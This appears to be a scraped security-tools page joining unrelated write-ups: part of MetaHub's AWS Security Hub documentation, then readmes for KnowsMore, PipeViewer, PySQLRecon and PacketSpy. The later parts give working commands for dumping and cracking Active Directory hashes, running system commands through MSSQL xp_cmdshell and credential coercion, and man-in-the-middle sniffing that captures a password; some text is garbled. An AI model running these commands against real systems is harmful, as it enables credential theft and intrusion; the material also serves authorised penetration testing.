MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, you will need this if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume, adding the option --mh-assume-role in the Lambda function configuration (See previous step) and adding the corresponding policy to allow the Lambda to assume that role in the lambda role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior

You need first to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID= "ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY= "XXXXXXXXX"
export AWS_SESSION_TOKEN= "XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account that the AWS Security Hub findings. The --mh-assume-role will be used to connect with the affected resources directly in the affected account. This role needs to have enough policies for being able to describe resources.

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filter findings, as this option relies on AWS API for filtering. You can't use the options --update-findings or --enrich-findings as those findings are not in the AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all findings titles together under each affected resource and the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column
  • You can group/ungroup findings
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.

 

XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE filtering for AWS Security Hub using the option --sh-filters, the same way you would filter using AWS CLI but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template Security Hub Filtering using YAML templates.

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW

If a value contains spaces, you should specify it using double quotes: "ProductName="Security Hub"

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub like "EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS". You can call your YAML file using the option --sh-template <<FILE>>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metaHub --sh-template templates/default.yml

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=False

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. AWS Security Hub API is limited to 100 findings per update. Metahub will split your results into 100 items chucks to avoid this limitation and update your findings beside the amount.

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three finding each making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-checks public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.

Duplication is when you use more than one scanner and get the same problem from more than one.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have in your dashboard four findings for one resource!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update these four Workflow Status findings using only one command: See Updating Workflow Status

Contributing

You can follow this guide if you want to contribute to the Context module guide.



KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse the quality of password (length , lower case, upper case, digit, special and latin)
  • Analyse similarity of password with company and user name
  • Search for users, passwords and hashes
  • Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords like the output bellow

weak passwords by company name similarity +-------+--------------+---------+----------------------+-------+ | top | password | score | company_similarity | qty | |-------+--------------+---------+----------------------+-------| | 1 | company123 | 7024 | 80 | 1111 | | 2 | Company123 | 5209 | 80 | 824 | | 3 | company | 3674 | 100 | 553 | | 4 | Company@10 | 2080 | 80 | 329 | | 5 | company10 | 1722 | 86 | 268 | | 6 | Company@2022 | 1242 | 71 | 202 | | 7 | Company@2024 | 1015 | 71 | 165 | | 8 | Company2022 | 978 | 75 | 157 | | 9 | Company10 | 745 | 86 | 116 | | 10 | Company21 | 707 | 86 | 110 | +-------+--------------+---------+----------------------+-------+ " dir="auto">
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problem with dependency version Check the Virtual ENV file

Execution Flow

There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use the secretsdump to extract ntds hashes with the command bellow

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the command bellow

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to name of your company

Wipe sensitive data

As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

By: Zion3R


A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

Overview

PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


Usage

Double-click the EXE binary and you will get the list of all named pipes.

Build

We used Visual Studio to compile it.
When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:

Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

Warning

We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
Note that James Forshaw talked about it here.
We can't change it because we depend on third-party DLL.

Features

  • A detailed overview of named pipes.
  • Filter\highlight rows based on cells.
  • Bold specific rows.
  • Export\Import to\from JSON.
  • PipeChat - create a connection with available named pipes.

Demo

PipeViewer3_v1.0.mp4

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

License

Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

By: Zion3R


PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


Install

PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

Commands

All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enu merate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]

Usage

PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

View global options:

pysqlrecon --help

View command specific options:

pysqlrecon [GLOBAL_OPTS] COMMAND --help

Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns rows), with the --database flag.

Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

--link and --impersonate and incompatible.

Development

pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help

Adding a Command

PySQLRecon is easily extensible - see the template and instructions in resources

TODO

  • Add SQLRecon SCCM commands
  • Add Azure SQL DB support?

References and Credits



PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

By: Zion3R


PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


Features

  • Packet Capture: Capture and analyze network packets in real-time.
  • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
  • Raw Payload Viewing: View raw payload data for deeper investigation.
  • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

Installation

git clone https://github.com/HalilDeniz/PacketSpy.git

Requirements

PacketSpy requires the following dependencies to be installed:

pip install -r requirements.txt

Getting Started

To get started with PacketSpy, use the following command-line options:

root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method

Examples

  1. Device Detection
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe

  1. Man-in-the-Middle Sniffing
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************

HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

Raw Payload:
b'uname=admin&pass=mysecretpassword'

HTTP Response:
Status Code: b'302'
